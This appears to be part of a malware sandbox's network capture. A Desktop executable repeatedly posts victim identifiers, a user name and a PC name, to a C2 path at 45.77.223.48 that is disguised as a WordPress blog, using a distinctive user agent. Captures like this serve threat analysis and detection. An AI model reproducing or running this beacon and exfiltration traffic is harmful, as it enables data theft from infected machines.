Apr 26, 2024 04:42:13.653060913 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:13.653183937 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:13.661458969 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:13.661822081 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:13.661916018 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:13.662199020 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:13.662368059 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:13.662462950 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:13.662504911 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49744	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:14.041821003 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:14.229063988 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:15.182286024 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:14 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:15.182529926 CEST	64	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8
Apr 26, 2024 04:42:15.182548046 CEST	77	IN	Data Raw: 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: " /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:15.204698086 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:15.205224991 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:15.205243111 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:15.205295086 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:15.205383062 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:15.205466986 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:15.205483913 CEST	670	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49745	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:15.814851046 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:16.005577087 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:16.929127932 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:15 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:16.929332018 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:16.929466963 CEST	11	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 Data Ascii: UTF-8" />
Apr 26, 2024 04:42:16.929522991 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:16.939404964 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:16.939680099 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:16.939841986 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:16.939990997 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:16.940095901 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:16.940192938 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49747	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:17.251353025 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:17.439920902 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:18.335382938 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:17 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:18.335608959 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:18.335690022 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:18.344870090 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:18.344933987 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:18.345019102 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:18.345182896 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:18.345417976 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:18.345484018 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 26, 2024 04:42:18.522166967 CEST	1289	IN	Data Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49750	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:18.687769890 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:18.879486084 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:19.788387060 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:18 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:19.788469076 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:19.788588047 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:19.797753096 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:19.798095942 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:19.798274040 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:19.798572063 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:19.798681974 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:19.798770905 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:19.798825979 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
